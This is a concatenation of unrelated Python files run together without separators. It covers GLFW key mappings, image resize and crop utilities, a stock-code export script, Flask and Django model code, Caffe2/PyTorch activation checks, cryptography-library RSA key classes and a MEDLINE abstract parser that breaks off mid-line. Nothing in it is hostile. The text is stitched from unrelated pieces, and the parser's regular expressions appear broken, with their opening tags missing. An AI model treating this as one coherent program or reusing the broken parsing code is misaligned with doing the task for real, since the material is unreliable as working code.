Slash = 47 # / Num0 = 48 Num1 = 49 Num2 = 50 Num3 = 51 Num4 = 52 Num5 = 53 Num6 = 54 Num7 = 55 Num8 = 56 Num9 = 57 Semicolon = 59 # ; Equal = 61 # = A = 65 B = 66 C = 67 D = 68 E = 69 F = 70 G = 71 H = 72 I = 73 J = 74 K = 75 L = 76 M = 77 N = 78 O = 79 P = 80 Q = 81 R = 82 S = 83 T = 84 U = 85 V = 86 W = 87 X = 88 Y = 89 Z = 90 LeftBracket = 91 # [ Backslash = 92 # \ RightBracket = 93 # ] GraveAccent = 96 # ` Escape = 256 Enter = 257 Tab = 258 Backspace = 259 Delete = 261 Right = 262 Left = 263 Down = 264 Up = 265 PageUp = 266 PageDown = 267 Home = 268 End = 269 CapsLock = 280 F1 = 290 F2 = 291 F3 = 292 F4 = 293 F5 = 294 F6 = 295 F7 = 296 F8 = 297 F9 = 298 F10 = 299 F11 = 300 F12 = 301 Keypad0 = 320 Keypad1 = 321 Keypad2 = 322 Keypad3 = 323 Keypad4 = 324 Keypad5 = 325 Keypad6 = 326 Keypad7 = 327 Keypad8 = 328 Keypad9 = 329 KeypadDecimal = 330 KeypadDivide = 331 KeypadMultiply = 332 KeypadSubtract = 333 KeypadAdd = 334 KeypadEnter = 335 KeypadEqual = 336 LeftShift = 1 << 9 LeftControl = 1 << 10 LeftAlt = 1 << 11 LeftSuper = 1 << 12 RightShift = 1 << 13 RightControl = 1 << 14 RightAlt = 1 << 15 RightSuper = 1 << 16 Menu = 348 @classmethod def from_glfw_keycode(cls, keycode): if keycode in _KEY_MAP: return _KEY_MAP[keycode] _KEY_MAP = { glfw.KEY_SPACE: KeyCode.Space, glfw.KEY_APOSTROPHE: KeyCode.Apostrophe, glfw.KEY_COMMA: KeyCode.Comma, glfw.KEY_MINUS: KeyCode.Minus, glfw.KEY_PERIOD: KeyCode.Period, glfw.KEY_SLASH: KeyCode.Slash, glfw.KEY_0: KeyCode.Num0, glfw.KEY_1: KeyCode.Num1, glfw.KEY_2: KeyCode.Num2, glfw.KEY_3: KeyCode.Num3, glfw.KEY_4: KeyCode.Num4, glfw.KEY_5: KeyCode.Num5, glfw.KEY_6: KeyCode.Num6, glfw.KEY_7: KeyCode.Num7, glfw.KEY_8: KeyCode.Num8, glfw.KEY_9: KeyCode.Num9, glfw.KEY_SEMICOLON: KeyCode.Semicolon, glfw.KEY_EQUAL: KeyCode.Equal, glfw.KEY_A: KeyCode.A, glfw.KEY_B: KeyCode.B, glfw.KEY_C: KeyCode.C, glfw.KEY_D: KeyCode.D, glfw.KEY_E: KeyCode.E, glfw.KEY_F: KeyCode.F, glfw.KEY_G: KeyCode.G, glfw.KEY_H: KeyCode.H, glfw.KEY_I: KeyCode.I, glfw.KEY_J: KeyCode.J, glfw.KEY_K: KeyCode.K, glfw.KEY_L: KeyCode.L, glfw.KEY_M: KeyCode.M, glfw.KEY_N: KeyCode.N, glfw.KEY_O: KeyCode.O, glfw.KEY_P: KeyCode.P, glfw.KEY_Q: KeyCode.Q, glfw.KEY_R: KeyCode.R, glfw.KEY_S: KeyCode.S, glfw.KEY_T: KeyCode.T, glfw.KEY_U: KeyCode.U, glfw.KEY_V: KeyCode.V, glfw.KEY_W: KeyCode.W, glfw.KEY_X: KeyCode.X, glfw.KEY_Y: KeyCode.Y, glfw.KEY_Z: KeyCode.Z, glfw.KEY_LEFT_BRACKET: KeyCode.LeftBracket, glfw.KEY_BACKSLASH: KeyCode.Backslash, glfw.KEY_RIGHT_BRACKET: KeyCode.RightBracket, glfw.KEY_GRAVE_ACCENT: KeyCode.GraveAccent, glfw.KEY_ESCAPE: KeyCode.Escape, glfw.KEY_ENTER: KeyCode.Enter, glfw.KEY_TAB: KeyCode.Tab, glfw.KEY_BACKSPACE: KeyCode.Backspace, glfw.KEY_DELETE: KeyCode.Delete, glfw.KEY_RIGHT: KeyCode.Right, glfw.KEY_LEFT: KeyCode.Left, glfw.KEY_DOWN: KeyCode.Down, glfw.KEY_UP: KeyCode.Up, glfw.KEY_PAGE_UP: KeyCode.PageUp, glfw.KEY_PAGE_DOWN: KeyCode.PageDown, glfw.KEY_HOME: KeyCode.Home, glfw.KEY_END: KeyCode.End, glfw.KEY_CAPS_LOCK: KeyCode.CapsLock, glfw.KEY_F1: KeyCode.F1, glfw.KEY_F2: KeyCode.F2, glfw.KEY_F3: KeyCode.F3, glfw.KEY_F4: KeyCode.F4, glfw.KEY_F5: KeyCode.F5, glfw.KEY_F6: KeyCode.F6, glfw.KEY_F7: KeyCode.F7, glfw.KEY_F8: KeyCode.F8, glfw.KEY_F9: KeyCode.F9, glfw.KEY_F10: KeyCode.F10, glfw.KEY_F11: KeyCode.F11, glfw.KEY_F12: KeyCode.F12, glfw.KEY_KP_0: KeyCode.Keypad0, glfw.KEY_KP_1: KeyCode.Keypad1, glfw.KEY_KP_2: KeyCode.Keypad2, glfw.KEY_KP_3: KeyCode.Keypad3, glfw.KEY_KP_4: KeyCode.Keypad4, glfw.KEY_KP_5: KeyCode.Keypad5, glfw.KEY_KP_6: KeyCode.Keypad6, glfw.KEY_KP_7: 
KeyCode.Keypad7, glfw.KEY_KP_8: KeyCode.Keypad8, glfw.KEY_KP_9: KeyCode.Keypad9, glfw.KEY_KP_DECIMAL: KeyCode.KeypadDecimal, glfw.KEY_KP_DIVIDE: KeyCode.KeypadDivide, glfw.KEY_KP_MULTIPLY: KeyCode.KeypadMultiply, glfw.KEY_KP_SUBTRACT: KeyCode.KeypadSubtract, glfw.KEY_KP_ADD: KeyCode.KeypadAdd, glfw.KEY_KP_ENTER: KeyCode.KeypadEnter, glfw.KEY_KP_EQUAL: KeyCode.KeypadEqual, glfw.KEY_LEFT_SHIFT: KeyCode.LeftShift, glfw.KEY_LEFT_CONTROL: KeyCode.LeftControl, glfw.KEY_LEFT_ALT: KeyCode.LeftAlt, glfw.KEY_LEFT_SUPER: KeyCode.LeftSuper, glfw.KEY_RIGHT_SHIFT: KeyCode.RightShift, glfw.KEY_RIGHT_CONTROL: KeyCode.RightControl, glfw.KEY_RIGHT_ALT: KeyCode.RightAlt, glfw.KEY_RIGHT_SUPER: KeyCode.RightSuper, glfw.KEY_MENU: KeyCode.Menu } _MOUSE_MAP = { glfw.MOUSE_BUTTON_LEFT: MouseButton.Left, glfw.MOUSE_BUTTON_MIDDLE: MouseButton.Middle, glfw.MOUSE_BUTTON_RIGHT: MouseButton.Right } # Copyright (c) Open-MMLab. All rights reserved. import cv2 import numpy as np def _scale_size(size, scale): """Rescale a size by a ratio. Args: size (tuple[int]): (w, h). scale (float): Scaling factor. Returns: tuple[int]: scaled size. """ w, h = size return int(w * float(scale) + 0.5), int(h * float(scale) + 0.5) interp_codes = { 'nearest': cv2.INTER_NEAREST, 'bilinear': cv2.INTER_LINEAR, 'bicubic': cv2.INTER_CUBIC, 'area': cv2.INTER_AREA, 'lanczos': cv2.INTER_LANCZOS4 } def imresize(img, size, return_scale=False, interpolation='bilinear', out=None): """Resize image to a given size. Args: img (ndarray): The input image. size (tuple[int]): Target size (w, h). return_scale (bool): Whether to return `w_scale` and `h_scale`. interpolation (str): Interpolation method, accepted values are "nearest", "bilinear", "bicubic", "area", "lanczos". out (ndarray): The output destination. Returns: tuple | ndarray: (`resized_img`, `w_scale`, `h_scale`) or `resized_img`. """ h, w = img.shape[:2] resized_img = cv2.resize( img, size, dst=out, interpolation=interp_codes[interpolation]) if not return_scale: return resized_img else: w_scale = size[0] / w h_scale = size[1] / h return resized_img, w_scale, h_scale def imresize_like(img, dst_img, return_scale=False, interpolation='bilinear'): """Resize image to the same size of a given image. Args: img (ndarray): The input image. dst_img (ndarray): The target image. return_scale (bool): Whether to return `w_scale` and `h_scale`. interpolation (str): Same as :func:`resize`. Returns: tuple or ndarray: (`resized_img`, `w_scale`, `h_scale`) or `resized_img`. """ h, w = dst_img.shape[:2] return imresize(img, (w, h), return_scale, interpolation) def rescale_size(old_size, scale, return_scale=False): """Calculate the new size to be rescaled to. Args: old_size (tuple[int]): The old size (w, h) of image. scale (float | tuple[int]): The scaling factor or maximum size. If it is a float number, then the image will be rescaled by this factor, else if it is a tuple of 2 integers, then the image will be rescaled as large as possible within the scale. return_scale (bool): Whether to return the scaling factor besides the rescaled image size. Returns: tuple[int]: The new rescaled image size. 
""" w, h = old_size if isinstance(scale, (float, int)): if scale <= 0: raise ValueError(f'Invalid scale {scale}, must be positive.') scale_factor = scale elif isinstance(scale, tuple): max_long_edge = max(scale) max_short_edge = min(scale) scale_factor = min(max_long_edge / max(h, w), max_short_edge / min(h, w)) else: raise TypeError( f'Scale must be a number or tuple of int, but got {type(scale)}') new_size = _scale_size((w, h), scale_factor) if return_scale: return new_size, scale_factor else: return new_size def imrescale(img, scale, return_scale=False, interpolation='bilinear'): """Resize image while keeping the aspect ratio. Args: img (ndarray): The input image. scale (float | tuple[int]): The scaling factor or maximum size. If it is a float number, then the image will be rescaled by this factor, else if it is a tuple of 2 integers, then the image will be rescaled as large as possible within the scale. return_scale (bool): Whether to return the scaling factor besides the rescaled image. interpolation (str): Same as :func:`resize`. Returns: ndarray: The rescaled image. """ h, w = img.shape[:2] new_size, scale_factor = rescale_size((w, h), scale, return_scale=True) rescaled_img = imresize(img, new_size, interpolation=interpolation) if return_scale: return rescaled_img, scale_factor else: return rescaled_img def imflip(img, direction='horizontal'): """Flip an image horizontally or vertically. Args: img (ndarray): Image to be flipped. direction (str): The flip direction, either "horizontal" or "vertical". Returns: ndarray: The flipped image. """ assert direction in ['horizontal', 'vertical'] if direction == 'horizontal': return np.flip(img, axis=1) else: return np.flip(img, axis=0) def imflip_(img, direction='horizontal'): """Inplace flip an image horizontally or vertically. Args: img (ndarray): Image to be flipped. direction (str): The flip direction, either "horizontal" or "vertical". Returns: ndarray: The flipped image (inplace). """ assert direction in ['horizontal', 'vertical'] if direction == 'horizontal': return cv2.flip(img, 1, img) else: return cv2.flip(img, 0, img) def imrotate(img, angle, center=None, scale=1.0, border_value=0, auto_bound=False): """Rotate an image. Args: img (ndarray): Image to be rotated. angle (float): Rotation angle in degrees, positive values mean clockwise rotation. center (tuple[float], optional): Center point (w, h) of the rotation in the source image. If not specified, the center of the image will be used. scale (float): Isotropic scale factor. border_value (int): Border value. auto_bound (bool): Whether to adjust the image size to cover the whole rotated image. Returns: ndarray: The rotated image. """ if center is not None and auto_bound: raise ValueError('`auto_bound` conflicts with `center`') h, w = img.shape[:2] if center is None: center = ((w - 1) * 0.5, (h - 1) * 0.5) assert isinstance(center, tuple) matrix = cv2.getRotationMatrix2D(center, -angle, scale) if auto_bound: cos = np.abs(matrix[0, 0]) sin = np.abs(matrix[0, 1]) new_w = h * sin + w * cos new_h = h * cos + w * sin matrix[0, 2] += (new_w - w) * 0.5 matrix[1, 2] += (new_h - h) * 0.5 w = int(np.round(new_w)) h = int(np.round(new_h)) rotated = cv2.warpAffine(img, matrix, (w, h), borderValue=border_value) return rotated def bbox_clip(bboxes, img_shape): """Clip bboxes to fit the image shape. Args: bboxes (ndarray): Shape (..., 4*k) img_shape (tuple[int]): (height, width) of the image. Returns: ndarray: Clipped bboxes. 
""" assert bboxes.shape[-1] % 4 == 0 cmin = np.empty(bboxes.shape[-1], dtype=bboxes.dtype) cmin[0::2] = img_shape[1] - 1 cmin[1::2] = img_shape[0] - 1 clipped_bboxes = np.maximum(np.minimum(bboxes, cmin), 0) return clipped_bboxes def bbox_scaling(bboxes, scale, clip_shape=None): """Scaling bboxes w.r.t the box center. Args: bboxes (ndarray): Shape(..., 4). scale (float): Scaling factor. clip_shape (tuple[int], optional): If specified, bboxes that exceed the boundary will be clipped according to the given shape (h, w). Returns: ndarray: Scaled bboxes. """ if float(scale) == 1.0: scaled_bboxes = bboxes.copy() else: w = bboxes[..., 2] - bboxes[..., 0] + 1 h = bboxes[..., 3] - bboxes[..., 1] + 1 dw = (w * (scale - 1)) * 0.5 dh = (h * (scale - 1)) * 0.5 scaled_bboxes = bboxes + np.stack((-dw, -dh, dw, dh), axis=-1) if clip_shape is not None: return bbox_clip(scaled_bboxes, clip_shape) else: return scaled_bboxes def imcrop(img, bboxes, scale=1.0, pad_fill=None): """Crop image patches. 3 steps: scale the bboxes -> clip bboxes -> crop and pad. Args: img (ndarray): Image to be cropped. bboxes (ndarray): Shape (k, 4) or (4, ), location of cropped bboxes. scale (float, optional): Scale ratio of bboxes, the default value 1.0 means no padding. pad_fill (Number | list[Number]): Value to be filled for padding. Default: None, which means no padding. Returns: list[ndarray] | ndarray: The cropped image patches. """ chn = 1 if img.ndim == 2 else img.shape[2] if pad_fill is not None: if isinstance(pad_fill, (int, float)): pad_fill = [pad_fill for _ in range(chn)] assert len(pad_fill) == chn _bboxes = bboxes[None, ...] if bboxes.ndim == 1 else bboxes scaled_bboxes = bbox_scaling(_bboxes, scale).astype(np.int32) clipped_bbox = bbox_clip(scaled_bboxes, img.shape) patches = [] for i in range(clipped_bbox.shape[0]): x1, y1, x2, y2 = tuple(clipped_bbox[i, :]) if pad_fill is None: patch = img[y1:y2 + 1, x1:x2 + 1, ...] else: _x1, _y1, _x2, _y2 = tuple(scaled_bboxes[i, :]) if chn == 1: patch_shape = (_y2 - _y1 + 1, _x2 - _x1 + 1) else: patch_shape = (_y2 - _y1 + 1, _x2 - _x1 + 1, chn) patch = np.array( pad_fill, dtype=img.dtype) * np.ones( patch_shape, dtype=img.dtype) x_start = 0 if _x1 >= 0 else -_x1 y_start = 0 if _y1 >= 0 else -_y1 w = x2 - x1 + 1 h = y2 - y1 + 1 patch[y_start:y_start + h, x_start:x_start + w, ...] = img[y1:y1 + h, x1:x1 + w, ...] patches.append(patch) if bboxes.ndim == 1: return patches[0] else: return patches def impad(img, shape, pad_val=0): """Pad an image to a certain shape. Args: img (ndarray): Image to be padded. shape (tuple[int]): Expected padding shape (h, w). pad_val (Number | Sequence[Number]): Values to be filled in padding areas. Default: 0. Returns: ndarray: The padded image. """ if not isinstance(pad_val, (int, float)): assert len(pad_val) == img.shape[-1] if len(shape) < len(img.shape): shape = shape + (img.shape[-1], ) assert len(shape) == len(img.shape) for i in range(len(shape)): assert shape[i] >= img.shape[i] pad = np.empty(shape, dtype=img.dtype) pad[...] = pad_val pad[:img.shape[0], :img.shape[1], ...] = img return pad def impad_to_multiple(img, divisor, pad_val=0): """Pad an image to ensure each edge to be multiple to some number. Args: img (ndarray): Image to be padded. divisor (int): Padded image edges will be multiple to divisor. pad_val (Number | Sequence[Number]): Same as :func:`impad`. Returns: ndarray: The padded image. 
""" pad_h = int(np.ceil(img.shape[0] / divisor)) * divisor pad_w = int(np.ceil(img.shape[1] / divisor)) * divisor return impad(img, (pad_h, pad_w), pad_val) from kiwoom import * from pandas import DataFrame kiwoom = Kiwoom() kiwoom.CommConnect() kospi = kiwoom.GetCodeListByMarket('0') kosdaq = kiwoom.GetCodeListByMarket('10') total = kospi + kosdaq rows = [] for code in total: name = kiwoom.GetMasterCodeName(code) rows.append((code, name)) columns = ['code', 'name'] df = DataFrame(data=rows, columns=columns) df = df.set_index('code') df.to_excel("code.xlsx") import werkzeug.security from flask_login import current_user from depc.controllers import Controller, AlreadyExistError from depc.extensions import db from depc.models.users import User class UserController(Controller): model_cls = User @classmethod def get_current_user(cls): user = current_user.to_dict() user["grants"] = {} for grant in current_user.grants: user["grants"][grant.team.name] = grant.role.name return user @classmethod def before_data_load(cls, data): if "password" in data: data["password"] = werkzeug.security.generate_password_hash( data["password"] ) @classmethod def handle_integrity_error(cls, obj, error): db.session.rollback() if User.query.filter_by(username=obj.username).all(): raise AlreadyExistError( "The user {username} already exists.", {"username": obj.username} ) # Please don't import anything from lass., to avoid circular dependencies import sqlalchemy.ext.declarative import sqlalchemy.orm import zope.sqlalchemy DBSession = sqlalchemy.orm.scoped_session( sqlalchemy.orm.sessionmaker( extension=zope.sqlalchemy.ZopeTransactionExtension() ) ) Base = sqlalchemy.ext.declarative.declarative_base() class PublicModel(Base): """Base class for models in the public schema.""" __abstract__ = True __table_args__ = {'schema': 'public'} # A script to check layer by layer activation differences between the Caffe2 and Pytorch models. import numpy as np import pickle import torch import argparse parser = argparse.ArgumentParser() parser.add_argument('--model', default='r50_nl', help='r50|r50_nl') args = parser.parse_args() #-----------------------------------------------------------------------------------------------# # Generate a random input. Normalize for fun. 
np.random.seed(123) data = np.random.rand(4, 3, 32, 224, 224).astype(np.float32)*255 data = (data-114.75)/57.375 #-----------------------------------------------------------------------------------------------# from caffe2.python import workspace from models import model_builder_video, resnet_video_org workspace.GlobalInit(['caffe2', '--caffe2_log_level=0']) workspace.ResetWorkspace() c2_net = model_builder_video.ModelBuilder( name='test', train=False, use_cudnn=False, cudnn_exhaustive_search=False, split='val') c2_net.net.Proto().type = 'dag' workspace.CreateBlob('data') workspace.CreateBlob('labels') c2_net, out_blob = resnet_video_org.create_model(model=c2_net, data='data', labels='labels', split='val', use_nl=args.model=='r50_nl') workspace.RunNetOnce(c2_net.param_init_net) workspace.CreateNet(c2_net.net) # load pretrained weights if args.model=='r50': wt_file = 'pretrained/i3d_baseline_32x2_IN_pretrain_400k.pkl' elif args.model=='r50_nl': wt_file = 'pretrained/i3d_nonlocal_32x2_IN_pretrain_400k.pkl' wts = pickle.load(open(wt_file, 'rb'), encoding='latin')['blobs'] for key in wts: if type(wts[key]) == np.ndarray: workspace.FeedBlob(key, wts[key]) workspace.FeedBlob('data', data) workspace.RunNet(c2_net.net.Proto().name) c2_blobs = {key: workspace.FetchBlob(key) for key in workspace.Blobs()} #-----------------------------------------------------------------------------------------------# torch.backends.cudnn.enabled = False from models import resnet data = torch.from_numpy(data).cuda() # load pretrained weights if args.model=='r50': pth_net = resnet.i3_res50(num_classes=400) key_map = torch.load('pretrained/i3d_r50_kinetics.pth.keymap') elif args.model=='r50_nl': pth_net = resnet.i3_res50_nl(num_classes=400) key_map = torch.load('pretrained/i3d_r50_nl_kinetics.pth.keymap') key_map = {'.'.join(k.split('.')[:-1]): '_'.join(v.split('_')[:-1]) for k, v in key_map.items()} pth_net.cuda().eval() def hook(module, input, output): setattr(module, "_value_hook", output) for name, module in pth_net.named_modules(): module.register_forward_hook(hook) pth_net({'frames':data}) pth_blobs = {} for name, module in pth_net.named_modules(): try: if len(name)>0: activation = module._value_hook.cpu().detach().numpy() pth_blobs[name] = activation except: pass for key in sorted(key_map): pth_v = pth_blobs[key] c2_v = c2_blobs[key_map[key]] # For each activation value, print the max/min/mean abs difference # Most of these are <1e-6 delta = np.abs(pth_v-c2_v) print (key, np.max(delta), np.min(delta), np.mean(delta))import numpy as np from os import listdir from glob import glob from time import time import cv2 import matplotlib.pyplot as plt def dataSetGenerator(path,resize=False,resize_to=224,percentage=100): """ DataSetsFolder | |----------class-1 | . |-------image-1 | . | . | . | . | . | . | . |-------image-n | . 
|-------class-n :param path: /DataSetsFolder :param resize: :param resize_to: :param percentage: :return: images, labels, classes """ start_time = time() classes = listdir(path) image_list = [] labels = [] for classe in classes: for filename in glob(path+'/'+classe+'/*.tif'): if resize:image_list.append(cv2.resize(cv2.imread(filename),(resize_to, resize_to))) else:image_list.append(cv2.imread(filename)) label=np.zeros(len(classes)) label[classes.index(classe)]=1 labels.append(label) indice = np.random.permutation(len(image_list))[:int(len(image_list)*percentage/100)] print("\n --- dataSet generated in %s seconds --- \n" % (np.round(time()-start_time))) return np.array([image_list[x] for x in indice]),np.array([labels[x] for x in indice]),np.array(classes) if __name__ == '__main__': # for testing the generator path = "C:/Users/shous/Desktop/UCMerced_LandUse/Images/" data,labels,classes = dataSetGenerator(path,percentage=80) print("\n dataSet classes :\n",*classes) print("\n data shape : ",data.shape) print("\n label shape :",labels[100]) plt.imshow(data[100]) plt.show() # -*- coding: utf-8 -*- # Exercícios by (CodingBat) # I. sem_pontas # seja uma string s de pelo menos dois caracteres # retorna uma string sem o primeiro e último caracter # sem_pontas('Hello') -> 'ell' # sem_pontas('python') -> 'ytho' # sem_pontas('coding') -> 'odin' def sem_pontas(s): return s[1:-1] def test_ex09(): print ('Sem Pontas') assert sem_pontas('Hello') == 'ell' assert sem_pontas('Python') == 'ytho' assert sem_pontas('coding') == 'odin' assert sem_pontas('code') == 'od' assert sem_pontas('ab') == '' assert sem_pontas('Chocolate!') == 'hocolate' assert sem_pontas('kitten') == 'itte' assert sem_pontas('woohoo') == 'ooho' from django.db import models class Game(models.Model): game_name = models.CharField(max_length=10) description = models.CharField(max_length=100) def __str__(self): return str(self.pk) + ":"+ self.game_name # Create your models here. 
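# Hypothetical usage sketch (added for illustration; not part of the original app).
# With the models in this module, one round of the gift-exchange game could be
# driven roughly like this from a view or the Django shell; all object values below
# are made up:
#
#   game = Game.objects.create(game_name="xmas2021", description="office party")
#   alice = Player.objects.create(game=game, first_name="Alice", last_name="A", position=1)
#   gift = Gift.objects.create(game=game, original_owner=alice, file_name="alice.png")
#   gift.current_owner = alice
#   gift.number_of_times_stolen += 1
#   gift.save()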
class Player(models.Model): game = models.ForeignKey(Game, on_delete=models.CASCADE, default=None) first_name = models.CharField(max_length=100, null=False, blank=False) last_name = models.CharField(max_length=100, null=False, blank=False) photo_name = models.CharField(max_length=100, null=True, blank=True) position = models.IntegerField(default=0, null=False, blank=True) def __str__(self): return str(self.pk) + ":" +self.first_name + ' ' + self.last_name + " pos="+str(self.position) class Gift(models.Model): game = models.ForeignKey(Game, on_delete=models.CASCADE,default=None) original_owner = models.ForeignKey(Player, on_delete=models.CASCADE, null=False, blank=False, related_name='original_owner') current_owner = models.ForeignKey(Player, on_delete=models.CASCADE, null=True, blank=True, related_name='current_owner') file_name = models.CharField(max_length=100) locked = models.BooleanField(default=False, null=False, blank=False) number_of_times_stolen = models.IntegerField(default=0, null=False, blank=False) wrap = models.CharField(max_length=15, default=None, blank=True, null=True) def __str__(self): res = str(self.pk) + ":"+ self.file_name+" Current Owner=" if self.current_owner is None: res = res + "None" else: res = res+self.current_owner.first_name return res class GameProperties(models.Model): game = models.OneToOneField(Game, on_delete=models.CASCADE,default=None) current_player = models.ForeignKey(Player, null=True, blank=True, on_delete=models.CASCADE) next_position = models.IntegerField(default=0, null=False, blank=False) #this is next position on gift open no_lock_stage = models.BooleanField(default=False, null=False, blank=False) started = models.BooleanField(default=False, null=False, blank=False) ended = models.BooleanField(default=False, null=False, blank=False) def __str__(self): return str(self.pk) + ":"+ self.game.game_name # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. 
from __future__ import absolute_import, division, print_function import six from cryptography import utils from cryptography.exceptions import UnsupportedAlgorithm, _Reasons from cryptography.hazmat.backends.interfaces import RSABackend from cryptography.hazmat.primitives import interfaces @utils.register_interface(interfaces.RSAPublicKey) class RSAPublicKey(object): def __init__(self, public_exponent, modulus): if ( not isinstance(public_exponent, six.integer_types) or not isinstance(modulus, six.integer_types) ): raise TypeError("RSAPublicKey arguments must be integers") if modulus < 3: raise ValueError("modulus must be >= 3") if public_exponent < 3 or public_exponent >= modulus: raise ValueError("public_exponent must be >= 3 and < modulus") if public_exponent & 1 == 0: raise ValueError("public_exponent must be odd") self._public_exponent = public_exponent self._modulus = modulus def verifier(self, signature, padding, algorithm, backend): if not isinstance(backend, RSABackend): raise UnsupportedAlgorithm( "Backend object does not implement RSABackend", _Reasons.BACKEND_MISSING_INTERFACE ) return backend.create_rsa_verification_ctx(self, signature, padding, algorithm) def encrypt(self, plaintext, padding, backend): if not isinstance(backend, RSABackend): raise UnsupportedAlgorithm( "Backend object does not implement RSABackend", _Reasons.BACKEND_MISSING_INTERFACE ) return backend.encrypt_rsa(self, plaintext, padding) @property def key_size(self): return utils.bit_length(self.modulus) @property def public_exponent(self): return self._public_exponent @property def modulus(self): return self._modulus @property def e(self): return self.public_exponent @property def n(self): return self.modulus def _modinv(e, m): """ Modular Multiplicative Inverse. Returns x such that: (x*e) mod m == 1 """ x1, y1, x2, y2 = 1, 0, 0, 1 a, b = e, m while b > 0: q, r = divmod(a, b) xn, yn = x1 - q * x2, y1 - q * y2 a, b, x1, y1, x2, y2 = b, r, x2, y2, xn, yn return x1 % m def rsa_crt_iqmp(p, q): """ Compute the CRT (q ** -1) % p value from RSA primes p and q. """ return _modinv(q, p) def rsa_crt_dmp1(private_exponent, p): """ Compute the CRT private_exponent % (p - 1) value from the RSA private_exponent and p. """ return private_exponent % (p - 1) def rsa_crt_dmq1(private_exponent, q): """ Compute the CRT private_exponent % (q - 1) value from the RSA private_exponent and q. 
""" return private_exponent % (q - 1) @utils.register_interface(interfaces.RSAPrivateKey) class RSAPrivateKey(object): def __init__(self, p, q, private_exponent, dmp1, dmq1, iqmp, public_exponent, modulus): if ( not isinstance(p, six.integer_types) or not isinstance(q, six.integer_types) or not isinstance(dmp1, six.integer_types) or not isinstance(dmq1, six.integer_types) or not isinstance(iqmp, six.integer_types) or not isinstance(private_exponent, six.integer_types) or not isinstance(public_exponent, six.integer_types) or not isinstance(modulus, six.integer_types) ): raise TypeError("RSAPrivateKey arguments must be integers") if modulus < 3: raise ValueError("modulus must be >= 3") if p >= modulus: raise ValueError("p must be < modulus") if q >= modulus: raise ValueError("q must be < modulus") if dmp1 >= modulus: raise ValueError("dmp1 must be < modulus") if dmq1 >= modulus: raise ValueError("dmq1 must be < modulus") if iqmp >= modulus: raise ValueError("iqmp must be < modulus") if private_exponent >= modulus: raise ValueError("private_exponent must be < modulus") if public_exponent < 3 or public_exponent >= modulus: raise ValueError("public_exponent must be >= 3 and < modulus") if public_exponent & 1 == 0: raise ValueError("public_exponent must be odd") if dmp1 & 1 == 0: raise ValueError("dmp1 must be odd") if dmq1 & 1 == 0: raise ValueError("dmq1 must be odd") if p * q != modulus: raise ValueError("p*q must equal modulus") self._p = p self._q = q self._dmp1 = dmp1 self._dmq1 = dmq1 self._iqmp = iqmp self._private_exponent = private_exponent self._public_exponent = public_exponent self._modulus = modulus @classmethod def generate(cls, public_exponent, key_size, backend): if not isinstance(backend, RSABackend): raise UnsupportedAlgorithm( "Backend object does not implement RSABackend", _Reasons.BACKEND_MISSING_INTERFACE ) return backend.generate_rsa_private_key(public_exponent, key_size) def signer(self, padding, algorithm, backend): if not isinstance(backend, RSABackend): raise UnsupportedAlgorithm( "Backend object does not implement RSABackend", _Reasons.BACKEND_MISSING_INTERFACE ) return backend.create_rsa_signature_ctx(self, padding, algorithm) def decrypt(self, ciphertext, padding, backend): if not isinstance(backend, RSABackend): raise UnsupportedAlgorithm( "Backend object does not implement RSABackend", _Reasons.BACKEND_MISSING_INTERFACE ) return backend.decrypt_rsa(self, ciphertext, padding) @property def key_size(self): return utils.bit_length(self.modulus) def public_key(self): return RSAPublicKey(self.public_exponent, self.modulus) @property def p(self): return self._p @property def q(self): return self._q @property def private_exponent(self): return self._private_exponent @property def public_exponent(self): return self._public_exponent @property def modulus(self): return self._modulus @property def d(self): return self.private_exponent @property def dmp1(self): return self._dmp1 @property def dmq1(self): return self._dmq1 @property def iqmp(self): return self._iqmp @property def e(self): return self.public_exponent @property def n(self): return self.modulus import logging from graphql import GraphQLError from neomodel import NeomodelException from kaffepause.accounts.exceptions import AccountCreationFailed from kaffepause.accounts.models import Account from kaffepause.location.selectors import get_location from kaffepause.users.forms import UserCreationForm logger = logging.getLogger(__name__) def validate_user(**kwargs): """Prepare the user object for creation and account 
connection.""" form = UserCreationForm(kwargs) if form.is_valid(): return form.save(commit=False) raise GraphQLError(form.errors.get_json_data()) def create_user(user, preferred_location_uuid=None, **kwargs): connect_user_and_account(user, **kwargs) if preferred_location_uuid: connect_preferred_location(preferred_location_uuid, user) return user def connect_preferred_location(preferred_location_uuid, user): preferred_location = get_location(location_uuid=preferred_location_uuid) user.preferred_location.connect(preferred_location) def connect_user_and_account(user, **kwargs): email = kwargs.get(Account.EMAIL_FIELD) account = Account.objects.get(email=email) user.uuid = account.id try_to_create_user(account, user) def try_to_create_user(account, user): """Try to save the user and delete the account upon failure.""" try: user.save() except NeomodelException: logger.exception( f"Failed to create user node, deleting account (id:{account.id})", ) account.delete() raise AccountCreationFailed logger.debug( f"Successfully created new account and user node (id/uuid:{account.id})" ) #!/usr/bin/python3 # this script parses titles and abstracts from the MEDLINE baseline import gzip import os import re months_list = {'Jan': 1, 'Feb': 2, 'Mar': 3, 'Apr': 4, 'May': 5, 'Jun': 6, 'Jul': 7, 'Aug': 8, 'Sep': 9, 'Oct': 10, 'Nov': 11, 'Dec': 12, 'Summer': 6, 'Winter': 12, 'Fall': 9, 'Spring': 3, 'January': 1, 'February': 2, 'March': 3, 'April': 4, 'May': 5, 'June': 6, 'July': 7, 'August': 8, 'September': 9, 'October': 10, 'November': 11, 'December': 12, } source_directories = ['/pstore/data/i2e/i2e_sources/Source_Data/MEDLINE_download/2020/Base/'] output_file = "pmid_date.txt" f_out = open(output_file, "w", encoding = "utf-8") months_list_keys = sorted(months_list, key=months_list.get) mesh_heading_area = 0 descriptor_names = [] found = 0 pmid = "0" abstract = "" title = "" year = "" month = "" day = "" pubdate_zone = 0 for source_directory in source_directories: print(source_directory) files = os.listdir(source_directory) # go through every file in MEDLINE for file in files: input_file = os.path.join(source_directory, file) if re.search("\.gz", input_file): print(input_file) f = gzip.open(input_file, "rt", encoding = "utf-8") for line in f: line = line[:-1] # take the first PMID as the PMID of the record if pmid == "0": if re.search("(.+)<\/PMID>", line): matched = re.search("(.+)<\/PMID>", line) pmid = matched.group(1) # read publication date if re.search("(.+)<\/Year>", line): matched = re.search("(.+)<\/Year>", line) year = matched.group(1) if re.search("(.+)<\/Month>", 